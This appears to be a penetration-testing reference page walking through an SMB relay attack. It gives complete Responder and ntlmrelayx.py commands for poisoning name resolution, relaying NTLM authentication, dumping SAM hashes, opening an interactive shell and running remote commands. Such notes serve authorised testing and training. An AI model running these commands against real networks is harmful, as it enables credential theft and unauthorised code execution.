SMB Relay

Steps

  1. Identify Host without SMB Signing

  2. Configure Responder

  3. Run Responder

  4. Run NTLM Relay

  5. Wait for an event (SMB connection, User login, etc.)

  6. Capture Hash

Requirements

  • SMB signing must be Disabled or Not Enforced

  • By default, SMB signing is Disabled on workstations.

  • SMB signing is enabled on Servers.

  • The relayed user's credentials must be a local administrator on the target machine for the relay to have any real value.

  • You cannot capture a hash on your machine and relay it back to the same machine. It has to be relayed to a different host.

SMB Relay Enumeration

General Usage: nmap --script=smb2-security-mode.nse -p445 [IP] -Pn

nmap --script=smb2-security-mode.nse -p445 10.1.1.14-15 -Pn
Nmap: SMB Enumeration

Configure Responder

In Responder.conf, the SMB and HTTP servers should be turned off so that Responder only poisons name resolution and leaves those connections to ntlmrelayx.py.

sudo nano /etc/responder/Responder.conf
Responder.conf

Responder

General Usage: sudo responder -I [net interface] -dPv

sudo responder -I eth0 -dPv

NTLM Relay

General Usage: sudo ntlmrelayx.py -tf [target hosts] -smb2support

Once the event has been triggered, ntlmrelayx.py relays the captured authentication to the target hosts and, by default, attempts to dump the local SAM hashes.

sudo ntlmrelayx.py -tf hosts.txt -smb2support
NTLM Relay: Dumped SAM Hashes

Store NTLMv2 Hashes

When you run the SMB relay attack normally, it won't show you the NTLMv2 hash that was relayed to the machines. Use the option --output-file [filename] to store the relayed NTLMv2 hashes in a file.

sudo ntlmrelayx.py -tf hosts.txt -smb2support --output-file ntlmv2.txt

Other SMB Relay Attacks

Interactive Shell

The -i option opens an interactive shell on a local port; you also need to connect to that port with netcat to use the shell.

sudo ntlmrelayx.py -tf targets.txt -smb2support -i
ntlmrelayx.py: Successful Interactive Shell
nc 127.0.0.1 11000
Netcat Connection

Run Commands

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Successful command execution

Cracking SAM Hashes

Refer to the Hashcat page under the Password Attacks section: NTLM Hash
